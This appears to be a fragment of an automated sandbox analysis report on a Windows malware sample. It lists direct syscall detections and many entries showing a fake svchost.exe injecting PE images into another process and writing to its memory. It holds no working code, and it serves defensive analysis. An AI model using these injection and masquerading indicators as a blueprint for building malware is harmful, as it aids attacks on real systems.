    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtTerminateThread: Direct from: 0x76F02FCC
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtAdjustPrivilegesToken: Direct from: 0x76F02EAC
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtOpenKeyEx: Direct from: 0x76F02B9C
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtProtectVirtualMemory: Direct from: 0x76F02F9C
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtSetInformationProcess: Direct from: 0x76F02C5C
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtNotifyChangeKey: Direct from: 0x76F03C2C
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtUnmapViewOfSection: Direct from: 0x76F02D3C
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtCreateMutant: Direct from: 0x76F035CC
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtMapViewOfSection: Direct from: 0x76F02D1C
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtResumeThread: Direct from: 0x76F036AC
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtQuerySystemInformation: Direct from: 0x1C
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFC
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtQuerySystemInformation: Direct from: 0x76F02DFC
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeNtQueryInformationProcess: Direct from: 0x76F02C26
    Injects a PE file into a foreign processes
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 15E2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23F2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2522000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E42000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2482000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2542000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 22D2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E42000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 892000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 14F2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2CC2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: FE2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3152000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2062000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D32000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1272000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2342000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1202000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28F2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EF2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 24A2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3082000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FA2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: D02000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2742000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 742000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2552000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EC2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 802000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2612000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1062000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1012000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 13F2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 22E2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2BF2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2392000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2262000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2952000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2862000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2712000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 902000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 25E2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29C2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2962000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2222000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: BF2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2BE2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 762000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 10C2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28F2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2562000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FF2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2542000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 8D2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2812000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 11D2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1402000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: AC2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 14F2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28E2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E82000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23E2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 932000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 25C2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2332000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D92000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2F22000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2882000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29C2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2C72000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D62000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: F82000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2AE2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 30E2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2742000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2932000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1572000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 26B2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FA2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 27B2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23C2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 522000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 24E2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3062000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29E2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D02000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D82000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2DF2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EB2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3072000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2C62000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D72000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2252000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FB2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EA2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 8D2000 value starts with: 4D5AJump to behavior
    Writes to foreign memory regions
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 15E0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 15E1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 15E2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1635000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23F0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23F1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23F2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2445000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2520000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2521000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2522000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2575000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E40000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E41000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E42000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E95000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2480000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2481000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2482000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 24D5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2540000Jump to behavior
